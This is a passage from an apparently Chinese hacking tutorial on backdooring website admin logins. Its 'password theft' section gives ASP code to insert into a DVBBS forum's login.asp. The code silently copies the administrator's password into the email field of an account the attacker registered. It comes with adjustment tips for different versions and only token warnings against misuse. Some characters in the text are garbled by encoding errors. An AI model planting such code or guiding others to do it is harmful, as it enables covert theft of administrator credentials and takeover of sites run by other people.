圖三

　　呵呵，別做壞事哦............

　　小結(jié)一下：我們先找到弄到管理員賬號，然后找到它的驗證頁面，根據(jù)它的驗證內(nèi)容來寫入我們要的后門。不同的系統(tǒng)有不同的驗證方式，比如青創(chuàng)文章系統(tǒng)它不但要驗證你的用戶名還要驗證等級，但是我們總體思路還是一樣，就是他驗證什么我們就加入什么。

　　密碼竊探篇

　　可以說上述方法在動網(wǎng)論壇或者其他論壇面前是蒼白無力的，因為一般論壇由于交互性較強，所以在驗證上考慮了很多。以動網(wǎng)為例，你要登錄后臺，他先驗證你有沒有先登錄了前臺，沒有的話就給你返回一個錯誤頁面。你登錄前臺后系統(tǒng)會給你一個seession來記錄你的CacheName和你的ID，然后在你登錄后臺的時候拿出來比較你前后臺身份是否一致，一直就通過，否則kill，面對這樣嚴格的驗證，難道我們就沒有辦法基后臺了嗎？對，沒有了（誰拿雞蛋扔我？這么浪費。），但是我們可以想新的辦法，既然驗證這么嚴格，那么我如果拿著密碼光明正大的進去呢？因此，這里一個新的思路就是拿到它的明文密碼。什么時候有明文密碼呢？對了，就在管理員登錄的時候。好，我們就在那里做手腳，把它登錄的密碼發(fā)給我們，然后我們拿和它的密碼去登錄。呵呵，是不是很像sniffer�。吭谙略谇皫讉�月剛和好兄弟潛龍在野利用硬件sniffer配合省網(wǎng)安局的人端掉一個非法電影網(wǎng)站，足足4000G的硬盤，幾十臺服務(wù)器，一個字：爽

　　好了，我們開始修改它的程序。編輯login.asp，加入以下幾句話：

　　if not isnull(trim(request("username"))) then

　　if request("username")="admin" then

　　sql="update [Dv_Vser] set UserEmail=(select userpassword from

　　[Dv_User]

　　where username='"& request("username")&"') where

　　UserName='aweige'"

　　conn.execute(sql)

　　end if

　　end if　　

　　這幾句話的意思就是說如果admin（假設(shè)的，實際操作中改為你要的管理員名字）登錄成功就更新數(shù)據(jù)庫，把他的密碼放到我資料的E-mail中。當然，你必須先在論壇里注冊一個用戶名。結(jié)果如圖四：

　　圖四

　　還有，如果是動網(wǎng)7.0以下的默認數(shù)據(jù)庫admin表名和7.0以上有點不一樣，所以實際操作中不可生搬硬套。


　　后記：

　　對于以上兩種方法直到目前為止我還想不出任何比較有效的解決方法，因為你的網(wǎng)站被人家放了馬，你根本就沒辦法去阻止人家去插入，要是誰有好的解決方法記得告訴我。

　　另外，希望大家不要去搞破壞，那時我真的不愿看到的，也祝所有的網(wǎng)管們好運，希望你們不會碰上craker們。